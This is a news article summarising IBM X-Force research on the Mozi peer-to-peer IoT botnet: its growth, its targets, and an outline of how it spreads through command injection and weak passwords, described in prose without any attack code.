Researchers Find Mozi Botnet Continues to GrowIBM: P2P Botnet Now Accounts for 90% of IoT Network Traffic
Mozi, a relatively new peer-to-peer botnet, is now dominating global IoT network traffic, according to a new report from IBM’s X-Force unit.
The Mozi malware, which has been active since late 2019, accounted for nearly 90% of the global IoT network traffic IBM tracked between October 2019 and June. During this same period, the amount of overall botnet activity increased 400% worldwide, according to the report.
Mozi targets misconfigured IoT devices with command injection attacks that enable it to increase its size, according to the IBM X-Force. The botnet targets consumers’ IoT devices as well as connected devices used by enterprises.
"The continued growth of IoT usage and poor configuration protocols are the likely culprits behind this jump [in Mozi traffic]. This increase may have been fueled further by corporate networks being accessed remotely more often due to COVID-19," according to the IBM analysis.
Mozi is capable of launching distributed denial-of-service attacks as well as delivering spam and other types of malware. The botnet can also mine for cryptocurrency, say Charles DeBeck and David McMillen, threat intelligence analysts for IBM X-Force.
"The real story is the perseverance and sheer volume of this particular variant," DeBeck and McMillen tell Information Security Media Group. "In the past, we have seen IoT malware variants come and go, but Mozi has a robust footprint, which is persisting to present day."
Mozi Takes Hold
At first, the Mozi malware targeted consumer-grade IoT devices, including home routers and DVRs, to help build its malicious network, according to the Black Lotus Labs report. In most cases, these connected devices used weak passwords.
IBM reports that, over the last several months, the Mozi botnet has been taking advantage of vulnerabilities in a wider variety of devices, including enterprise-grade routers and devices made by Huawei, Netgear and D-Link as well as closed-circuit cameras.
As with other botnets recently spotted in the wild, Mozi used peer-to-peer communication protocols to distribute its malware and take control of other device nodes, according to IBM (see: 'FritzFrog' P2P Botnet Targets SSH Servers ).
"IoT botnets have focused almost exclusively on consumer devices, but this botnet highlights what IBM has seen as a continued shift toward enterprise targeting, which suggests an increasing threat to organizations using IoT devices," the report states
Mozi’s operators use command injection attacks to help increase the size of the botnet. This works by taking advantage of vulnerabilities in devices to run arbitrary commands
Mozi also can use brute-force methods from a hardcoded list to bypass weak passwords, according to the report.
As part of the initial attack, the Mozi operators use a shell command called "wget" that helps gain access and permissions. The wget command then retrieves a file called "mozi.a," which executes on the file of the compromised devices’ microprocessors. This enables the botnet operators to install other malware, according to the report. The Mozi botnet also can block and bind certain ports, which helps to ensure that the malware stays on the device.
Once a device is infected, Mozi uses the encrypted P2P protocol to look for other vulnerable nodes as well as to connect with other IoT devices already compromised with the malware, according to IBM.
The IBM report notes that about 84% of the infrastructure that supports Mozi is located in China.